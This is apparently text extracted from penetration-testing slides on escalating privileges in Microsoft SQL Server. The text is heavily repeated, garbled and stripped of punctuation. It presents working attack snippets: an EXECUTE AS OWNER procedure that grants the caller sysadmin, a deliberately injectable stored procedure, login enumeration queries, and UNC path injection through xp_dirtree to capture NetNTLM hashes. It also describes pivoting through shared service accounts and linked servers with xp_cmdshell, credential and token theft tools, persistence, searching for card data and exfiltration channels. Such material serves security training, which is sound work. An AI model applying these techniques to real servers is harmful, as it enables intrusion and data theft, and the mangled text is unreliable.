hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
